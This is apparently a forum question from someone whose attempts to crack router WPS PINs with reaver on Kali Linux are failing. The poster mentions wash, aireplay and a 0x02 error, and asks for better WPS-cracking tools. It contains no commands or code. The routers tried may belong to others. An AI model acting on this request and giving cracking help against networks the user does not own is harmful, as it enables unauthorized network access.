How to use reaver in kali linux effectively?

I am trying reaver but it does not give any results.

one router gives this error

using wash i found the wps is not locked

I tested on other routers as well, but they turned wps off(not locked) without even trying one pin. only gave 0x02 error. I used aireplay also but it seemed to not work or may be i am noob. can someone please help me out. Also are there any better options than reaver to crack wps.`
